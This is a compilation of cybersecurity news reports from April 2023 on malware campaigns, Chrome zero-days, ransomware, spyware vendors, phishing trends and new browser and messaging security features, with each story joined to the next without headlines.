"Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.

"It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways."

Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities.

It has also repeatedly leveraged trojanized versions of Kavach, the Indian government-mandated 2FA software, to deploy a variety of malware, such as CrimsonRAT and LimePad to harvest valuable information.

Another phishing campaign detected late last year took advantage of weaponized attachments to download malware designed to exfiltrate

database files created by the Kavach app.

The latest set of attacks entail the use of a backdoored version of Kavach to target Linux users working for Indian government agencies, indicating attempts made by the threat actor to expand its attack spectrum beyond Windows and Android ecosystems.

"When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. "Meanwhile, the payload is downloaded in the background, compromising the user's system."

The starting point of the infections is an ELF malware sample, a compiled Python executable that's engineered to retrieve the second-stage Poseidon payload from a remote server.

The cybersecurity firm noted that the fake Kavach apps are primarily distributed through rogue websites that are disguised as legitimate Indian government sites. This includes www.ksboard[.]in and www.rodra[.]in.

With social engineering being the primary attack vector used by Transparent Tribe, users working within the Indian government are advised to double-check URLs received in emails before opening them.

"Repercussions of this APT36 attack could be significant, leading to loss of sensitive information, compromised systems, financial losses, and reputational damage," Sandapolla said.

Source

The flaw, tracked as CVE-2023-2136, is described as a case of integer overflow in Skia, an open source 2D graphics library. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on April 12, 2023.

"Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD).

The tech giant, which also fixed seven other security issues with the latest update, said it's aware of active exploitation of the flaw, but did not disclose additional details to prevent further abuse.

The development marks the second Chrome zero-day vulnerability to be exploited by malicious actors this year, and comes merely days after Google patched CVE-2023-2033 last week. It's not immediately clear if the two zero-days have been chained together as part of in-the-wild attacks.

Users are recommended to upgrade to version 112.0.5615.137 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Source

As a result of the bug, users were failing to toggle LSA protection to on as a device restart, which was prompted by the change. It would do nothing and revert the change automatically. In essence, LSA protection would remain disabled even after the PC was restarted as instructed by the Defender app.

Microsoft had provided a workaround for the issue, and it basically involved dismissing such warnings. However, the company may have since fixed the problem with a more recent Defender update (KB5007651).

According to Deskmodder, the new update, Windows Security Service version 1.0.2303.27001 has supposedly fixed the issue. The site suggests the issue was resolved by an update to "Kernel-mode Hardware-enforced Stack Protection" security feature present under Core Isolation (VBS). The feature was introduced with Windows 11 22H2. However,this update (KB5007651) was released nearly two weeks ago and Microsoft's known issues dashboard still lists the bug as open. Hence, there may be more to the story here.

Elsewhere online, others are also noticing that the setting may be disabled by default (via Windows 11 forums), or it could be a bug. In order to use the Kernel-mode Hardware-enforced Stack Protection feature, Intel's Control-flow Enforcement Technology (CET) or AMD Shadow Stack technology is required. Supported chips include Intel 11th Gen Tiger Lake or newer parts, or AMD Zen 3 and newer.

Microsoft may have fixed LSA bug with kernel-mode hardware stack protection in Windows 11

Apple’s Macs have long escaped ransomware, but that may be changing

Although Team-Xecuter reportedly bagged millions of dollars from this illegal operation, Bowser played a relatively minor role in this process, receiving roughly $320,000 over the course of seven years. Regardless, he was prosecuted by Nintendo and was sentenced to 40 months in prison along with a $15 million fine, out of which $10 million is damages to Nintendo.

Now, Bowser has reportedly been released from a federal U.S. prison due to good behavior and is on his way back to his home country, Canada. Despite being freed from the detention center, Bowser faces a difficult road ahead. He has to pay Nintendo a maximum of 25-30% of his gross monthly salary once he lands a stable job until the damages are paid off. Currently, he has paid $175 through multiple $25 payments based on the wages he was getting in prison.

It's unlikely that 51-year-old Gary Bowser will ever be able to pay off his fines completely, but that's not Nintendo's goal here either. While the company claimed that it spent $65 million to upgrade the Switch's anti-piracy measures to circumvent Team-Xecuter's tactics, the fine is just to deter future hackers from going down the same path. Nintendo had previously stated that:

This is a very significant moment for us. It’s the purchase of video games that sustains Nintendo and the Nintendo ecosystem, and it is the games that make the people smile. It’s for that reason that we do all we can to prevent games on Nintendo systems from being stolen.

Bowser has six months to go before he begins paying his next installments to Nintendo in order to pay off the remaining ~$10 million.

Source: TorrentFreak via Nintendo Life | Image via Know Your Meme

Nintendo hacker Bowser released from prison, will pay off fine for the rest of his life

Most of the losses concern investment scams, which accounted for $1.5 billion, followed by remote access scams that resulted in losses of $229 million, and payment redirection scams that cost victims another $224 million.

These figures are based on data collected by ACCC’s Scamwatch, ReportCyber, the Australian Financial Crimes Exchange (AFCX), IDCARE, and various other government agencies.

According to ACCC, the number of scam reports submitted to Scamwatch last year was just under 240,000, 16.5% lower than in 2021. However, the financial losses per victim rose by 50% to an average of $20,000.

ACCC’s Deputy Chair Catriona Lowe commented that this increase in the effectiveness of scams results from a growing sophistication in the themes used by the attackers, making the scams more believable.

“We have seen alarming new tactics emerge which make scams incredibly difficult to detect,” commented Lowe.

“This includes everything from impersonating official phone numbers, email addresses, and websites of legitimate organizations to scam texts that appear in the same conversation thread as genuine messages.”

“Hi Mom” and “toll/Linkt” text scams had an explosive growth of 469% in 2022, tricking Australians into losing almost $25 million.

The most significant driver, though, was data breaches, which had a record year in Australia in 2022. 

These security incidents are excellent opportunities for scammers who use them as bait for fraudulent communications with targets.

A noteworthy security incident from 2022 that scammers abused was the breach of Optus in September 2022, which resulted in the leak of the personal data of 11 million customers of the telecommunications company.

In October 2022, the Australian Federal Police (AFP) arrested a young Sydney resident who attempted to extort thousands of Optus customers via SMS, demanding a payment of $1,300 not to sell their data to hackers.

The most notable data breach in Australia for 2023 is Latitude Financial, which impacted 14 million customers of the personal loans service provider.

The Australian state approved a bill that amends the country’s privacy legislation late last year, setting a maximum penalty of AU$50 million for firms that suffer large-scale data breaches.

Source

The malicious malware component is part of a third-party library used by all sixty apps that the developers unknowingly added to their apps.

Some of the impacted apps are:

• L.POINT with L.PAY - 10 million downloads
• Swipe Brick Breaker - 10 million downloads
• Money Manager Expense & Budget - 10 million downloads
• GOM Player - 5 million downloads
• LIVE Score, Real-Time Score - 5 million downloads
• Pikicast - 5 million downloads
• Compass 9: Smart Compass - 1 million downloads
• GOM Audio - Music, Sync lyrics - 1 million downloads
• LOTTE WORLD Magicpass - 1 million downloads
• Bounce Brick Breaker - 1 million downloads
• Infinite Slice - 1 million downloads
• SomNote - Beautiful note app - 1 million downloads
• Korea Subway Info: Metroid - 1 million downloads

According to McAfee's research team, which discovered Goldoson, the malware can collect data on installed apps, WiFi and Bluetooth-connected devices, and the user's GPS locations.

Additionally, it can perform ad fraud by clicking ads in the background without the user's consent.

Stealing data from Android devices

When the user launches an app that contains Goldoson, the library registers the device and receives its configuration from a remote server whose domain is obfuscated.

The configuration contains parameters that set which data-stealing and ad-clicking functions Goldoson should run on the infected device and how often.

Goldoson configuration (McAfee)

 

The data collection function is typically set to activate every two days, sending to the C2 server a list of installed apps, geographical location history, MAC address of devices connected over Bluetooth and WiFi, and more.

JSON request that exfiltrates data (McAfee)

 

The level of data collection depends on the permissions granted to the infected app during its installation and the Android version. Android 11 and above are better protected against arbitrary data collection; however, McAfee found that even in recent versions of the OS, Goldoson had enough permissions to gather sensitive data in 10% of the apps.

The ad-clicking function takes place by loading HTML code and injecting it into a customized, hidden WebView, and then using that to perform multiple URL visits, generating ad revenue. 

The victim does not see any indication of this activity on their device.

Goldoson's ad-clicking activity (McAfee)

Library removed, but risk still there

McAfee is a Google App Defense Alliance member that helps keep Google Play clean from malware/adware threats. As such, the researchers informed Google about its findings, and the developers of the impacted apps were alerted accordingly.

Many of the affected apps were cleaned by their developers, who removed the offending library, and those that didn't respond in time had their apps removed from Google Play for non-compliance with the store's policies.

Google confirmed the action to BleepingComputer, stating that the apps violated Google Play policies.

"The safety of users and developers are at the core of Google Play. When we find apps that violate our policies, we take appropriate action," Google told BleepingComputer.

"We have notified the developers that their apps are in violation of Google Play policies and fixes are needed to come into compliance."

Users who installed an impacted app from Google Play can remediate the risk by applying the latest available update.

However, Goldoson exists on third-party Android app stores too, and the chances of those still harboring the malicious library are high.

Common signs of adware and malware infection include device heating up, battery draining quickly, and unusually high internet data usage even when the device is not in use.

Source

The mobile malware was discovered by cybersecurity firm Cyble, which reports seeing distribution through compromised websites, Discord attachments, and Bitbucket hosting services.

Chameleon includes a wide range of malicious functionality, including stealing user credentials through overlay injections and keylogging, cookies, and SMS texts from the infected device.

A focus on evasion

Upon launch, the malware performs a variety of checks to evade detection by security software.

These checks include anti-emulation checks to detect if the device is rooted and debugging is activated, increasing the likelihood that the app is running in an analyst’s environment.

If the environment appears clean, the infection continues, and Chameleon requests the victim to permit it to use the Accessibility Service, which it abuses to grant itself additional permissions, disable Google Play Protect, and stop the user from uninstalling it.

Requesting permission to use the Accessibility Service (Cyble)

 

At first connection with the C2, Chameleon sends the device version, model, root status, country, and precise location, probably to profile the new infection.

Next, depending on what entity the malware impersonates, it opens its legitimate URL in a WebView and starts loading malicious modules in the background.

These include a cookie stealer, a keylogger, an injector of phishing pages, a lock screen PIN/pattern grabber, and an SMS stealer that can snatch one-time passwords and help the attackers bypass 2FA protections.

SMS interception (Cyble)

 

Most of these data-stealing systems rely on the abuse of Accessibility Services to work as required, allowing the malware to monitor the screen content, monitor for specific events, intervene to modify interface elements, or send certain API calls as needed.

Abuse of Accessibility Service to retrieve lock screen password (Cyble)

 

The same system service is also abused to prevent the uninstallation of the malware, identifying when the victim attempts to remove the malicious app and deleting its shared preference variables to make it appear as if it’s no longer present in the device.

Auto-delete shared preferences variables (Cyble)

 

The wiping of shared preferences files forces the app to re-establish communications with the C2 the next time it launches but prevents its uninstallation and makes it harder for researchers to analyze.

Cyble also observed code that enables Chameleon to download a payload during runtime and save it on the host as a “.jar” file, to be executed later via DexClassLoader. However, this feature is currently unused.

Code to download additional payloads (Cyble)

 

Chameleon is an emerging threat that may add more features and capabilities in future versions.

Android users are advised to be cautious with apps they install on their devices, only download software from official stores, and ensure that Google Play Protect is always enabled.

Source

LockBit ransomware for Mac payload spotted by experts

The Mac version of LockBit was spotted by the folks at MalwareHunterTeam. The archive that they analyzed contained a file that was called Locker_Apple_M1_64, which suggests that the ransomware is targeting Apple Silicon M1 systems.

The security experts investigated a sample of the malware's archive, which was uploaded to VirusTotal on March 20th of this year. The findings also revealed that a LockBit ransomware for PowerPC Macs exists. Security researcher, Florian Roth, spotted an earlier report of the malware from December 2022. Vx-underground, which hosts malware source code and samples, also confirmed that the first payload of LockBit ransomware for Mac has surfaced online. The analysts also pointed out that the Mac ransomware has actually existed for about 6 months, since November 2022.

Security researchers say that the ransomware is not ready for deployment

Numerous reports from other security researchers claim that the LockBit ransomware for Macs is likely a test version. Azim Khodjibaev of Cisco Talos stated that their research suggests that the ransomware is not ready for deployment.

Patrick Wardle, another macOS security expert, echoed the sentiment, saying that the encryptor is not in a completed form. He mentioned that the Mac malware is a basic version based on the Linux build, and doesn't run easily on macOS. In case you didn't know, ransomware tools encrypts the data on impacted computers. LockBit's current Mac version is also not capable of bypassing TCC (Transparency, Consent, and Control) in macOS. The researcher also explained in a blog post that the malware crashes due to a bug in its code. A snippet of the ransomware contained strings related to Windows artifacts, which shows that the code was originally written for Windows. Some of these strings were shared among other versions that targeted other platforms, meaning that the malware has a shared codebase. Wardle says that in its current form, the malware cannot infect macOS, and that users do not need to be worried about the safety of their Macs.

Brett Callow, a threat analyst at Emisoft, also chimed in, saying that there is no evidence to indicate that LockBit's macOS variant has been used in a cyberattack. But he acknowledged the fact that the hackers compiling a macOS version does show their intention of targeting Macs.

This was later confirmed by LockBitSupp, a representative of the ransomware gang, who told BleepingComputer that the group is indeed working on a version for Mac. So, while that may sound, there is no reason to panic right now, as the malware isn't ready yet. LockBit has offered its services to other attackers via its ransomware-as-a-service (RaaS) model, so it is possible that some cybercriminals could use it to target Mac users.

A few months ago, the LockBit ransomware gang released a free decryptor for a children’s hospital in Canada, after a "rogue member" attacked the healthcare organization. While we are talking about security stuff, a recent report by Citizen Lab and Microsoft revealed details about how a Pegasus-like spyware called Reign was used for targeted attacks on iPhones.

Source

The latest activity, which commenced on April 4, 2023, has primarily targeted users in Germany, Argentina, Italy, Algeria, Spain, the U.S., Russia, France, the U.K., and Morocco.

QBot (aka Qakbot or Pinkslipbot) is a banking trojan that's known to be active since at least 2007. Besides stealing passwords and cookies from web browsers, it doubles up as a backdoor to inject next-stage payloads such as Cobalt Strike or ransomware.

Distributed via phishing campaigns, the malware has seen constant updates during its lifetime that pack in anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. It has also emerged as the most prevalent malware for the month of March 2023, per Check Point.

"Early on, it was distributed through infected websites and pirated software," Kaspersky researchers said, explaining QBot's distribution methods.

"Now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings."

Email thread hijacking attacks are not new. It occurs when cybercriminals insert themselves into existing business conversations or initiate new conversations based on information previously gleaned by compromised email accounts.

The goal is to entice victims into opening malicious links or malicious attachments, in this case, an enclosed PDF file that masquerades as a Microsoft Office 365 or Microsoft Azure alert.

Opening the document leads to the retrieval of an archive file from an infected website that, in turn, contains an obfuscated Windows Script File (.WSF). The script, for its part, incorporates a PowerShell script that downloads malicious DLL from a remote server. The downloaded DLL is the QBot malware.

The findings come as Elastic Security Labs unearthed a multi-stage social engineering campaign that employs weaponized Microsoft Word documents to distribute Agent Tesla and XWorm by means of a custom .NET-based loader.

Source

The development was reported by the Israeli business newspaper Calcalist, citing unnamed sources, adding the company "hasn't been fully active for a while" and that it "has been in a difficult situation for several months."

The company's board of directors are looking to sell off its intellectual property, the report further added.

News of the purported shutdown comes as the firm's spyware framework – dubbed REIGN – was outed as having been used against journalists, political opposition figures, and NGO workers across North America, Central Asia, Southeast Asia, Europe, and the Middle East.

Microsoft described REIGN as a "suite of exploits, malware, and infrastructure designed to exfiltrate data from mobile devices."

The attacks entailed the exploitation of a now-patched flaw in iOS to deploy sophisticated surveillanceware capable of surreptitiously gathering sensitive information, including audio, pictures, passwords, files, and locations.

Apple told The Hacker News last week that there was no indication to suggest that the exploit, codenamed ENDOFDAYS, has been put to use since the company released iOS 14.4.2 in March 2021.

QuaDream, like its Israeli counterparts NSO Group and Candiru, is a private-sector offensive actor (PSOA) that markets end-to-end hacking tools that can be utilized by its customers in running the operations.

While the company has largely managed to stay under the shadows, Haaretz reported in June 2021 that its spyware technology was sold to Saudi Arabia to carry out zero-click attacks against targets of interest.

Then last year, Reuters revealed that QuaDream had independently developed an exploit to break into iPhones that's comparable to the one provided by NSO Group by leveraging a flaw in iMessage. Apple addressed the vulnerability in September 2021.

Source

Human brain power is no match for hackers emboldened with artificial intelligence-powered digital smash-and-grab attacks using email deceptions. Consequently, cybersecurity defenses must be guided by AI solutions that know hackers’ strategies better than they do.

This approach of fighting AI with better AI surfaced as an ideal strategy in research conducted in March by cyber firm Darktrace to sniff out insights into human behavior around email. The survey confirmed the need for new cyber tools to counter AI-driven hacker threats targeting businesses.

The study sought a better understanding of how employees globally react to potential security threats. It also charted their growing knowledge of the need for better email security.

Darktrace’s global survey of 6,711 employees across the U.S., U.K., France, Germany, Australia, and the Netherlands found that respondents experienced a 135% increase in “novel social engineering attacks” across thousands of active Darktrace email customers from January to February 2023. The results corresponded with the widespread adoption of ChatGPT.

These novel social engineering attacks use sophisticated linguistic techniques, including increased text volume, punctuation, and sentence length with no links or attachments. The trend suggests that generative AI, such as ChatGPT, is providing an avenue for threat actors to craft sophisticated and targeted attacks at speed and scale, according to researchers.

One of the three most significant takeaways from the research is that most employees are concerned about the threat of AI-generated emails, according to Max Heinemeyer, chief product officer for Darktrace.

“This is not surprising, since these emails are often indistinguishable from legitimate communications and some of the signs that employees typically look for to spot a ‘fake’ include signals like poor spelling and grammar, which chatbots are proving highly efficient at circumventing,” he told TechNewsWorld.

Research Highlights

Darktrace asked retail, catering, and leisure companies how concerned they are, if at all, that hackers can use generative AI to create scam emails indistinguishable from genuine communication. Eighty-two percent said they are concerned.

More than half of all respondents indicated their awareness of what makes employees think an email is a phishing attack. The top three are invitations to click a link or open an attachment (68%), unknown sender or unexpected content (61%), and poor use of spelling and grammar (61%).

That is significant and troubling, as 45% of Americans surveyed noted that they had fallen prey to a fraudulent email, according to Heinemeyer. 

“It is unsurprising that employees are concerned about their ability to verify the legitimacy of email communications in a world where AI chatbots are increasingly able to mimic real-world conversations and generate emails that lack all of the common signs of a phishing attack, such as malicious links or attachments,” he said.

Other key results of the survey include the following:

• 70% of global employees have noticed an increase in the frequency of scam emails and texts in the last six months

• 87% of global employees are concerned about the amount of personal information available about them online that could be used in phishing and other email scams

• 35% of respondents have tried ChatGPT or other gen AI chatbots

Human Error Guardrails

Widespread accessibility to generative AI tools like ChatGPT and the increasing sophistication of nation-state actors means that email scams are more convincing than ever, noted Heinemeyer.

Innocent human error and insider threats remain an issue. Misdirecting an email is a risk for every employee and every organization. Nearly two in five people have sent an important email to the wrong recipient with a similar-looking alias by mistake or due to autocomplete. This error rises to over half (51%) in the financial services industry and 41% in the legal sector.

Regardless of fault, such human errors add another layer of security risk that is not malicious. A self-learning system can spot this error before the sensitive information is incorrectly shared.

In response, Darktrace unveiled a significant update to its globally deployed email solution. It helps to bolster email security tools as organizations continue to rely on email as their primary collaboration and communication tool.

“Email security tools that rely on knowledge of past threats are failing to future-proof organizations and their people against evolving email threats,” he said.

Darktrace’s latest email capability includes behavioral detections for misdirected emails that prevent intellectual property or confidential information from being sent to the wrong recipient, according to Heinemeyer.

AI Cybersecurity Initiative

By understanding what is normal, AI defenses can determine what does not belong in a particular individual’s inbox. Email security systems get this wrong too often, with 79% of respondents saying that their company’s spam/security filters incorrectly stop important legitimate emails from reaching their inbox.

With a deep understanding of the organization and how the individuals within it interact with their inbox, AI can determine for every email whether it is suspicious and should be actioned or if it is legitimate and should remain untouched.

“Tools that work from a knowledge of historical attacks will be no match for AI-generated attacks,” offered Heinemeyer.

Attack analysis shows a notable linguistic deviation — semantically and syntactically — compared to other phishing emails. That leaves little doubt that traditional email security tools, which work from a knowledge of historical threats, will fall short of picking up the subtle indicators of these attacks, he explained.

Bolstering this, Darktrace’s research revealed that email security solutions, including native, cloud, and static AI tools, take an average of 13 days following the launch of an attack on a victim until the breach is detected.

“That leaves defenders vulnerable for almost two weeks if they rely solely on these tools. AI defenses that understand the business will be crucial for spotting these attacks,” he said.

AI-Human Partnerships Needed

Heinemeyer believes the future of email security lies in a partnership between AI and humans. In this arrangement, the algorithms are responsible for determining whether the communication is malicious or benign, thereby taking the burden of responsibility away from the human.

“Training on good email security practices is important, but it will not be enough to stop AI-generate threats that look exactly like benign communications,” he warned.

One of the vital revolutions AI enables in the email space is a deep understanding of “you.” Instead of trying to predict attacks, an understanding of your employees’ behaviors must be determined based on their email inbox, their relationships, tone, sentiments, and hundreds of other data points, he reasoned.

“By leveraging AI to combat email security threats, we not only reduce risk but revitalize organizational trust and contribute to business outcomes. In this scenario, humans are freed up to work on a higher level, more strategic practices,” he said.

Not a Completely Unsolvable Cybersecurity Problem

The threat of offensive AI has been researched on the defensive side for a decade. Attackers will inevitably use AI to upskill their operations and maximize ROI, noted Heinemeyer.

“But this is not something we would consider unsolvable from a defense perspective. Ironically, generative AI may be worsening the social engineering challenge, but AI that knows you could be the parry,” he predicted.

Darktrace has tested offensive AI prototypes against the company’s technology to continuously test the efficacy of its defenses ahead of this inevitable evolution in the attacker landscape. The company is confident that AI armed with a deep understanding of the business will be the most powerful way to defend against these threats as they continue to evolve.

Source

Microsoft is delivering the latest security definitions for Windows images via security intelligence update version 1.385.1537.0. The Defender package version is 20230330.2. On the support document describing the the new update, Microsoft writes:

The first hours of a newly installed Windows deployment can leave the system vulnerable because of a Microsoft Defender protection gap. This is because the OS installation images may contain outdated antimalware software binaries.

[..] Devices using either the Windows built-in antivirus or another security solution can benefit from these updates.

[..] This article describes antimalware update package for Microsoft Defender in the OS installation images (WIM and VHD files). This feature supports the following OS installation images:

• Windows 11
• Windows 10 (Enterprise, Pro, and Home editions)
• Windows Server 2019
• Windows Server 2016

Version information

• Defender package version: 20230330.2

This package updates the anti-malware client, anti-malware engine, and signature versions in the OS installation images to following versions:

• Platform version: 4.18.2302.7
• Engine version: 1.1.20100.6
• Security intelligence version: 1.385.1537.0

From Microsoft's security bulletin, we learn that the security intelligence update version 1.385.1537.0 was released at the end of last month. It adds threat detections for various trojans, hacktools, ransomware, among others. For those wondering, the latest intelligence update is version 1.387.1114.0 at the time of writing.

Microsoft released special Defender update for Windows 11, Windows 10 install images

Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on April 11, 2023.

"Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD).

The tech giant acknowledged that "an exploit for CVE-2023-2033 exists in the wild," but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.

CVE-2023-2033 also appears to share similarities with CVE-2022-1096, CVE-2022-1364, CVE-2022-3723, and CVE-2022-4262 – four other actively abused type confusion flaws in V8 that were remediated by Google in 2022.

Google closed out a total of nine zero days in Chrome last year. The development comes days after Citizen Lab and Microsoft disclosed the exploitation of a now-patched flaw in Apple iOS by customers of a shadowy spyware vendor named QuaDream to target journalists, political opposition figures, and an NGO worker in 2021.

Users are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Source

This week, theft of customer data remains the focus, with Yum! Brands sending data breach notifications for a ransomware attack in January.

Capita also remains silent on a Black Basta ransomware attack that occurred earlier this month, staying silent as to whether customer data was stolen, even as the ransomware gang attempts to extort them.

Other news this week revolves around research released about particular operations, including:

• DarkAngels ransomware launched a data leak site.
• Vice Society now uses a custom PowerShell script for data exfiltration.
• A technical analysis of Trigona, which BleepingComputer first reported on in 2022.
• Information on the new Kadavro Vector Ransomware.

Finally, we saw LockBit messing around with cybersecurity companies, claiming to have breached DarkTrace. However, the company said this is untrue and that systems were compromised.

Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @demonslay335, @malwareforme, @malwrhunterteam, @fwosar, @BleepinComputer, @Seifreed, @struppigel, @billtoulas, @Ionut_Ilascu, @serghei, @McAfee, @Fortinet, @Threatlabz, @pcrisk, and @GossiTheDog.

April 9th 2023

Black Basta ransomware group extorts Capita with stolen customer data, Capita fumble response.

In terms of Black Basta and Capita, they list Capita as currently being held to extortion – and provide evidence of exfiltrated data. This includes primary and secondary school job applications, a Capita nuclear document, Capita documents marked Confidential, passport scans, security vetting for customers and architecture diagrams.

April 10th 2023

KFC, Pizza Hut owner discloses data breach after ransomware attack

Yum! Brands, the brand owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack.

DarkAngels ransomware launches data leak site

Zscaler discovered that DarkAngels ransomware (AKA RansomHouse) launched a data leak site.

April 11th 2023

New STOP Ransomware variant

PCrisk found a new STOP ransomware variant that appends the .kiop extension.

April 14th 2023

Darktrace: Investigation found no evidence of LockBit breach

Cybersecurity firm Darktrace says it found no evidence that the LockBit ransomware gang breached its network after the group added an entry to their dark web leak platform, implying that they stole data from the company's systems.

Vice Society ransomware uses new PowerShell data theft tool in attacks

The Vice Society ransomware gang is deploying a new, rather sophisticated PowerShell script to automate data theft from compromised networks.

Technical Analysis of Trigona Ransomware

Zscaler ThreatLabz has been tracking the Trigona ransomware family, which dates back to June 2022. There has been public reporting that some of the group’s tactics, techniques, and procedures (TTPs) have overlapped with BlackCat/ALPHV ransomware.

Ransomware Roundup – Kadavro Vector Ransomware

FortiGuard Labs recently came across a ransomware named “Kadavro Vector”, a NoCry ransomware variant that encrypts files on compromised machines and demands a ransom in Monero (XMR) cryptocurrency for file decryption.

That's it for this week! Hope everyone has a nice weekend!

The Week in Ransomware - April 14th 2023 - A Focus on Stolen Data

TechCrunch has communicated with this unnamed individual, who offered evidence that they were part of the attack:

The hacker shared a file that was digitally signed with Western Digital’s code-signing certificate, showing they could now digitally sign files to impersonate Western Digital. Two security researchers also looked at the file and agreed it is signed with the company’s certificate.

The hacker claims that they want to be paid a ransom with a "minimum 8 figures" amount from Western Digital, or they will release the data they collected publicly. The individual says some of the data comes from the company's customers, but there's no further information on what might be included.

A spokesperson for Western Digital would not give any comments about the hacker's claims when asked by TechCrunch. The company has so far been very vague about what exactly happened when its network was breached. Its My Cloud online storage service was down for about 10 days this month but it was fully restored earlier this week. Its web store, however, is still offline.

Source

Microsoft's blog post says that the company noticed the new scams in February. They are being sent out by hackers who hope they can deliver the Remcos remote access trojan to a PC. Remcos is designed to enter Windows PCs and take over administrator privileges remotely. Microsoft says:

While social engineering lures like this one are common around Tax Day and other big topic current events, these campaigns are specific and targeted in a way that is uncommon. The targets for this threat are exclusively organizations that deal with tax preparation, financial services, CPA and accounting firms, and professional service firms dealing in bookkeeping and tax.

Naturally, these types of firms get very busy this time of year ahead of Tax Day with clients emailing them information about their taxes and financial information. Microsoft says that this phishing campaign has sent out emails that look like they come from a client of an accounting or tax firm. They contain a link to a real file-sharing service, with a real Amazon Web Services click-tracking link.

Unfortunately for the person who clicks on that link, they will then be taken to the file-sharing site, where the hacker has placed Windows shortcut (.LNK) files. Microsoft says:

These LNK files generate web requests to actor-controlled domains and/or IP addresses to download malicious files. These malicious files then perform actions on the target device and download the Remcos payload, providing the actor potential access to the target device and network.

The good news for Windows PC users who work in those financial firms is that Microsoft 365 Defender and Microsoft Defender Antivirus can detect these malicious files and prevent the remote takeover of their PCs. Obviously, those users should always be suspicious of any emails that have links to file-sharing sites, especially from clients that they don't know.

Source

With Account Protect, WhatsApp will now ask you to verify on your old device that you’re trying to use the app on a new device. Meta didn’t explain what happens if you’ve lost your old device, but presumably, this won’t prevent you from setting up on a new device. The new security check is just designed to provide a bit more security.

With Device Verification, Meta runs checks in the background to verify it’s really you sending messages. The company said the chief reason for adding this feature was to protect against unofficial WhatsApp clients. It said fake WhatsApp clients can steal your authentication keys to send spam. With Device Verifications, users will enjoy more security without having to do anything.

The last new addition is Automatic Security Codes, this feature uses something called Key Transparency. This automatically checks you have a secure connection with the person you’re chatting to. You'll be able to navigate to the encryption tab in WhatsApp in the coming months to see if chats are secure.

There’s nothing end users need to do to get these new features, just wait patiently as Meta rolls them out in the coming months.

WhatsApp will soon add three new security features

If you aren't aware, BlackLotus is a UEFI bootkit, and what makes this malware particularly dangerous is its ability to bypass Secure Boot systems even on updated Windows 11 systems. Besides that, BlackLotus also makes modifications to the registry to disable Hypervisor-protected Code Integrity (HVCI), which is a Virtualization-based Security (VBS) feature; as well as BitLocker encryption. It also disables Windows Defender by manipulating the Early Launch Anti-Malware (ELAM) driver and Windows Defender file system filter driver. The ultimate purpose is to deploy an HTTP downloader which delivers the malicious payloads.

Although the security vulnerability dubbed "Baton Drop" (CVE-2022-21894) was patched a year ago, it is still exploited as signed binaries have not yet been added to the UEFI revocation list. In a recently published guidance, Microsoft has summarized the malicious activities BlackLotus does after it has managed to infest:

The malware uses CVE-2022-21894 (also known as Baton Drop) to bypass Windows Secure Boot and subsequently deploy malicious files to the EFI System Partition (ESP) that are launched by the UEFI firmware. This allows the bootkit to:

1. Achieve persistence by enrolling the threat actor’s Machine Owner Key (MOK)
2. Turn off HVCI to allow deployment of a malicious kernel driver
3. Leverage the kernel driver to deploy the user-mode HTTP downloader for command and control (C2)
4. Turn off Bitlocker to avoid tamper protection strategies on Windows
5. Turn off Microsoft Defender Antivirus to avoid further detection

In its guidance, the tech giant has covered, in detail, the techniques to determine if the devices in an organization are infected, as well as recovery and prevention strategies. You can read it on Microsoft's official website.

Microsoft posts guide for Windows Secure Boot, Defender, VBS, BitLocker-bypassing BlackLotus

Total Cookie Protection can best be described as a sandbox for cookies. To better understand what it does, it is necessary to understand how cookies work without it.

When a user visits a website, the site, and any other site that has elements on the opened page, may place cookies and other data on the user's device. Some companies use these cookies to track users across websites and pages. The wider their reach is, the better their ability to track users.

Browsers included options to deal with cookies for a long time. Most allow users to block third-party cookies outright or delete cookies regularly. There are also extensions that help with cookies, such as Cookie AutoDelete.

Total Cookie Protection in Firefox

Total Cookie Protection in Firefox limits cookies to the websites they were created on. These cookies can't be accessed by other websites, which makes them for the use of tracking useless. In other words: cookies have only a limited use now in Firefox when it comes to tracking.

Firefox users had to enable the Total Cookie Protection feature manually up until now, using the Custom Enhanced Tracking Protection settings.

Mozilla is rolling out a change that adds Total Cookie Protection to Firefox's standard Tracking Protection mode. Enhanced Tracking Protection improves protection against online tracking through a variety of defensive tools.

The standard protection is the default, and it blocks social media trackers, cryptominers and fingerprinting scripts. Now, it is also blocking third-party cookies used for tracking users by default.

Note that the options is also enabled in Strict mode, and that users may configure it to be enabled in custom mode as well.

Closing Words

The change improves tracking protection in Firefox significantly. Previously, Firefox users had to enable the Total Cookie Protection feature manually in the browser to improve protection against cookie-based tracking.

Mozilla began prompting desktop users about the feature in May 2022 and launched it in Firefox for Android in November of the same year. Firefox did block a list of known tracking cookies at that point already.

Now that Total Cookie Protection is on by default in Firefox, Firefox users are better protected when it comes to cookie-based tracking. It is a good step in the right direction.

Those who want even more protections may want to check out Mullvad Browser, which is based on Tor, which itself is a modified Firefox ESR build.

